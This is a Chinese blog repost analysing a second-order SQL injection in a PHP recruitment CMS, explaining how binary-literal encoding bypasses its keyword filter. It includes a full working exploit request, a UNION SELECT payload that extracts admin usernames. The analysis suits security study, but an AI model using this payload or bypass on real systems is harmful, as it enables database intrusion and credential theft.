mysql 二次注入_某php开源cms有趣的二次注入

最新推荐文章于 2024-07-30 09:05:33 发布
最新推荐文章于 2024-07-30 09:05:33 发布
阅读量202 收藏
点赞数
文章标签: mysql 二次注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39748183/article/details/113980505
版权

原标题:某php开源cms有趣的二次注入

3b2f44a56a7d1580103cadd364a014e0.png

漏洞说明

这个漏洞涉及到了mysql中比较有意思的两个知识点以及以table作为二次注入的突破口,非常的有意思。此cms的防注入虽然是很变态的,但是却可以利用mysql的这两个特点绕过防御。本次的漏洞是出现在ndex.class.php中的likejob_action()和saveresumeson_action()函数,由于这两个函数对用户的输入没有进行严格的显示,同时利用mysql的特点能够绕过waf。

PS:此漏洞的触发需要在WAP环境下,所以在进行调试的时候需要修改浏览器的ua为Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

漏洞分析

mysql特点

特点1

传统的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。如果我们仅仅值需要插入一条记录,则使用insert into test(content) values('hello2')。如下图所示:

675bcf8681c4072ccfd35a34b9a317da.png

但是实际上还存在另外一种方式能够仅仅值插入一条记录。

insert into test set content='hello3';

9d2a6874a02bf1ef1fadfeeaa6dcd49e.png

可以看到这种方式和insert into test(content) values('hello2')是一样的。

说明插入数据时,利用values()和通过=指定列的方式结果都一样

特点2

我们知道mysql中能够使用十六进制表示字符串。如下:

a461144d400246102bba3b26a8141df5.png

其中0x68656c6c6f表示的就是hello。这是一个很常见的方式。

除了使用十六进制外,还可以使用二进制的方式进行插入。hello的二进制是01101000 01100101 01101100 01101100 01101111,那么我们的SQL语句还可以这样写,insert into test set content=0b0110100001100101011011000110110001101111。这种方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一样的。

mysql不仅可以使用十六进制插入,还可以使用二进制的方式插入

1e1f86f927ffaf76b512156a378246e2.png

waf防护分析

waf的防护是位于config/db.safety.php

其中的gpc2sql()过滤代码如下:

function gpc2sql($str, $str2) {

if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {

exit(safe_pape());

}

if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {

exit(safe_pape());

}

$arr = array("sleep" => "Sleep", " and " => " an d ", " or " => " Or ", "xor" => "xOr", "%20" => " ", "select" => "Select", "update" => "Update", "count" => "Count", "chr" => "Chr", "truncate" => "Truncate", "union" => "Union", "delete" => "Delete", "insert" => "Insert", """ => "“", "'" => "“", "--" => "- -", "(" => "(", ")" => ")", "00000000" => "OOOOOOOO", "0x" => "Ox");

foreach ($arr as $key => $v) {

$str = preg_replace('/' . $key . '/isU', $v, $str);

}

return $str;

}

可以看到将0x替换为了Ox,所以无法传入十六进制,但是我们却可以利用mysql中的二进制的特点,利用0b的方式传入我们需要的payload。

index.class.php漏洞分析

漏洞是位于wap/member/model/index.class.php中,漏洞产生的主要函数是位于likejob_action()和saveresumeson_action()中。我们首先分析likejob_action()。likejob_action()的主要代码如下:

33f93659f10c53b714f3807a1d2209b3.png

而DB_update_all()的代码如下:

function DB_update_all($tablename, $value, $where = 1,$pecial=''){

if($pecial!=$tablename){

$where =$this->site_fetchsql($where,$tablename);

}

$SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where;

$this->db->query("set sql_mode=''");

$return=$this->db->query($SQL);

return $return;

}

也就是说,当数据进入到DB_update_all()之后就不会有任何的过滤。那么漏洞点就在于resume_expect中的job_classid字段。job_classid字段的内容的传递如下图所示:

所以如如果我们控制了resume_expect中的job_classid字段,我们就能够修改这条语句了。

我们可以借助于saveresumeson_action()来向job_classid中插入我们的payload。saveresumeson_action()的关键代码如下:

9d594d22777ba965ea5061fc2ad47ef8.png

可以看到$table是直接通过"resume_".$_POST['table']拼接的,这也就以为着$table是我们可控的,之后$table进入了$this->obj->update_once()中。我们进入uptate_once()中:

c6ccefd8596325a5c0a9c57133d770f8.png

$table变量在update_once()没有进行任何的处理,直接进入到DB_update_all()中,我们追踪进入到DB_update_all()中:

4f1f6598ac251023d88899fac9e6b9cb.png

同样没有进行任何的处理。

通过上面的跟踪分析,表明$table="resume_".$_POST['table'];赋值之后,中途$table变量没有进行任何的过滤直接进入了最终的SQL语句查询。

如此整个攻击链就成功了,我们通过saveresumeson_action()中的$table可控,对resume_expect中的job_classid进行修改,之后通过likejob_action()读取job_classid字段的内容,执行我们的SQL语句。

由于我们无法使用十六进制,此时我们就需要使用到二进制(0b)插入我们的payload。

漏洞复现

注册用户/创建简历

注册用户创建简历。此时在phpyun_resume_expect中存在一条id=1的记录。

访问saveresumeson

我们访问saveresumeson对应的URL,写入我们的payload。根据语法,我们需要将table的内容设置为

expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #

由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #无法绕过SQL的防御,需要转化为二进制,是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那么最终的payload是:

URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1

POST:name=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23

此时我们执行的SQL语句是:

INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET

最终数据库中多了一条记录,如下:

689ddcdbbb0e90c8937367c820adcf76.png

我们顺利地向job_classid中插入了我们的的payload

访问likejob_action触发payload

接下来我们访问http://localhost/member/index.php?c=likejob&id=7,其中的id就是刚刚我们插入的payload所对应记录的id。当运行至DB_select_all()中执行的SQL语句是:

126094669be60ee4f6bfdd25823a602d.png

为了便于分析,我们将这条SQL语句放入到datagrid中分析:

d7827d0d3896ce1f44ee274f122ab44e.png

最终在页面上显示admin的信息。

92b61ffc0ac7052df4dbd24d0e3a53ee.png

至此整个漏洞都分析完毕了。

总结

一般来说,二次注入利用点一般都比较隐晦。所以二次注入的思路比一般的注入更加巧妙和有意思,在本例中体现得尤为明显。返回搜狐,查看更多

这个二次注入的点比较难找,二次注入中的利用table作为二次注入的利用点的例子还是比较少见的;

绕过方法也比较少见。本例中的waf的防护还是比较严格的,利用了mysql的两个少见特性就可以绕过了。

责任编辑:

weixin_39748183
关注
S-CMS企建v3二次SQL注入的方法
09-30
主要介绍了S-CMS企建v3二次SQL注入的方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
50cms3.0.12可二次开发.rar
07-06
50CMS是一款基于PHP语言和MySQL数据库的开源内容管理系统,主要针对中小企业和个人站长提供快速建站的解决方案。50CMS3.0.12是该系统的一个特定版本,具有较高的稳定性和一定的功能优化。这个版本的发布允许用户进行...
二次注入 php,yxcms二次注入漏洞
weixin_36205186的博客
03-13 238
[php]/protected/apps/member/controller/photoController.php$data['account']=$this->mesprefix.$this->auth['account'];$data['sort']=$_POST['sort'];//从这里入口$data['exsort']=empty($_POST['exsort'])?'':...
MySQL二次注入
最新发布
qq_69100706的博客
07-30 156
在CTF(Capture The Flag)竞赛中,遇到“二次注入”是一种常见的挑战类型,尤其是在涉及到数据库操作的场景中。二次注入通常发生在应用程序接收用户输入并将其存储到数据库后,再次从数据库读取并在输出时不进行适当的处理,导致恶意代码被执行的情况。在MySQL环境中,这通常涉及利用SQL语句或存储过程的执行。
php+mysql实现二次注入
weixin_33982670的博客
10-17 253
参考文献:https://www.jianshu.com/p/3fe7904683ac 环境 wampserver2.5-Apache-2.4.9-Mysql-5.6.17-php5.5.12-32b PS:我只有这个版本的wamp环境可以成功的实现二次注入,在phpstudy的版本中都自带的有转义,若是...
S-CMS企建v3二次SQL注入
weixin_30627381的博客
12-10 176
0x00 前言 悄悄的说一句,头一次挖到二次注入,我发现我膨胀了!虽然挺简单的,但也是My第一次,第一次!!!! 首发T00ls 0x01 目录 Sql注入 二次SQL注入 0x02 Sql注入 漏洞文件:\scms\bbs\bbs.php $action=$_GET["action"]; $S_id=$_GET["S_id"]; if($action=="...
mysql注入转义绕过_SQL注入防御绕过——二次注入
weixin_33124479的博客
01-28 691
01 二次注入原理二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入二次注入,可以概括为以下两步:第一步:插入恶意数据进行数据库插入数...
PHP实例开发源码——迅睿PHP开源视频电影CMS系统.zip
11-22
这个系统提供了一整套功能,帮助用户高效地管理和展示多媒体内容,同时也为开发者提供了可扩展的框架进行二次开发。 在深入探讨这个系统之前,我们首先了解一下PHPPHP(Hypertext Preprocessor)是一种广泛使用的...
织梦CMS二次开发手册
07-10
织梦CMS,全称DedeCMS,是一款基于PHP+MySQL技术构建的开源网站内容管理系统,深受许多企业和个人用户的喜爱。它的二次开发手册是为开发者提供的一份重要参考资料,旨在帮助他们深入理解织梦CMS的内部机制,从而进行...
基于PHP的迅睿CMS开源内容管理框架源码.zip
01-05
7. **安全措施**:作为一个开源CMS,迅睿CMS会包含一系列安全措施,如输入验证、SQL注入防护、XSS(跨站脚本攻击)防御等。学习这些安全实践,能帮助开发者构建更健壮的网站。 8. **错误日志和调试工具**:为了便于...
PHP实例开发源码——红色企业官网_小兵建站CMS.zip
11-25
【标题】"PHP实例开发源码——红色企业官网_小兵建站CMS.zip" 提供的是一个基于PHP语言开发的企业网站模板,名为“红色企业官网”,使用的可能是小兵建站CMS...对于有经验的开发者,这可能是一个参考或二次开发的基础。
mysql注入 —— 二次注入
SPS98
05-07 804
场景: 系统对传入值使用mysql_escape_string做了转义处理,不能直接注入, 但取出值时会自动转义,而代码中未再次转义就放到sql语句中使用(非预处理方式),使得间接注入成功, 实际场景:一个含有注册、登录、修改密码功能的系统。 数据库中有一个用户名为admin,密码为admin的用户, 现注册一个用户名为admin ' #,密码为12345的用户。 登录后将其密码修改为test...
二次sql注入
phphot
11-30 6178
f6J,K{F4E0m0这种注入方式一般是在如下情况出现时发生:为了预防SQL注入攻击,而将输入到应用程序中的某些数据进行了“转义(escape)”,但是这些数据却又在“未被转义(Unescaped)”的查询窗体中重复使用。PHPChina 开源社区门户 L?7nB8U M0| N例如,这里我们更改登录处理页面(在前面“攻击系统”一节中介绍的那个页面)以回避单引号:7D.o A+e"_
【sql注入二次注入
C_LCH_2000的博客
08-19 1049
注入原理 攻击者构造恶意的数据并存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。 防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入
mysql 二次注入,【干货总结】从实战看基础,由“强网杯”Three Hit聊聊二次注入...
weixin_42324002的博客
03-17 254
原标题:【干货总结】从实战看基础,由“强网杯”Three Hit聊聊二次注入之前参加“强网杯”,学到了不少姿势,其中的web题three hit印象深刻,考的是二次注入的问题,这里对二次注入尝试做一个小结。什么是二次注入?所谓二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入二次注入是sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。普通...
mysql 二次注入_SQL二次注入和截断联合使用
weixin_39559015的博客
02-10 354
这次主要是说明sql的二次注入和sql插入数据库时截断的问题而形成的一种特殊的注入手段,有时会有意想不到的效果。sql二次注入二次注入的原理也是非常的简单,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在将数据存入到了数据库中之...
php sql 二次注入,espcms 二次注入一枚
weixin_39667080的博客
03-18 99
Author:Yaseng1:通过 $alias 二次注入来控制sql用户昵称 $alias 从数据库查询出来 未过滤interface/member.php[php]$db_sql = "SELECT * FROM $db_table WHERE $db_where";$rsMember = $this->db->fetch_first($db_sql);if (!$rsMember...
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值